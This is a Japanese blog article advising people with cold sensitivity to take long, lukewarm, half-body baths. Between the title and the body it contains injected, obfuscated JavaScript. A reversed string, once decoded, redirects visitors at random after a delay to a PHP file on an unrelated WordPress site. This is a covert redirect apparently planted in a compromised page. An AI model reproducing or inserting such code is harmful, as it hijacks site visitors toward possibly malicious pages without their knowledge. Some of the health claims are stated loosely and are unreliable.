冷え性を改善する正しい入浴方法

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}top”>正しい入浴で冷え性を改善しましょう

冷え性の改善方法の1つとして、入浴は非常に効果的です。
ただし、正しい入浴の仕方をしないと逆効果になってしまう場合もあるので注意が必要です。

こんな入浴の仕方はNG!

以下のような入浴は、逆効果になる場合があるので注意が必要です。

・湯船につからずシャワーだけ

皮膚の表面の温度は上がりますが、体の芯からあったまっていないため、
お風呂から出たらまたすぐに体が冷えてしまいます。

・熱いお湯につかる

冷え性の方がやってしまいがちな入浴方法です。
お湯が熱いほど体が温まるように勘違いしがちですが、
体が温まるのは一時的なもので、実は湯冷めしやすいのです。

正しい入浴方法は「ぬるめのお湯にじっくり」

お湯の温度は、37℃~40℃くらいの、体温より少し高く心地よいと感じる温度にします。
そして、最低でも20分以上、じっくりとつかると体への温め効果が高くなります。

体の血液は、だいたい1分間で全身を循環すると言われています。
20分以上お風呂につかれば20回以上、体全体に温かい血液を循環させることができます。

これに対して、熱すぎるお湯に入ると長時間つかることができないため、
せっかく血液が温まっても体が十分に温まるほど循環させることができません。

また、お湯の温度が高すぎると交感神経が活発になり体が緊張状態になってしまうため、
リラックス効果を得るためにもお湯はぬるめが最適です。

半身浴も効果的!

意外かもしれませんが、肩までお湯につかる全身浴は、
体全体に水圧がかかり、肺や心臓に良くないと言われています。

20分以上じっくりお湯につかるので、体への負担を少なくするために、
みぞおちくらいまでのお湯に入る半身浴がお勧めです。

「逆に体が冷えちゃうんじゃないの?」と心配になるかもしれませんが、
温まった血液が循環するため、しっかりと上半身も温まってくれます。

また、全身浴よりも半身浴のほうが、急激に体が温まらないため、
ゆっくりと長時間入ることができます

まとめると・・・

お湯の温度は37℃~40℃
入る時間は20分以上
体への負担が少ない半身浴

これが冷え性を改善する入浴方法となります!是非試してみて下さいね。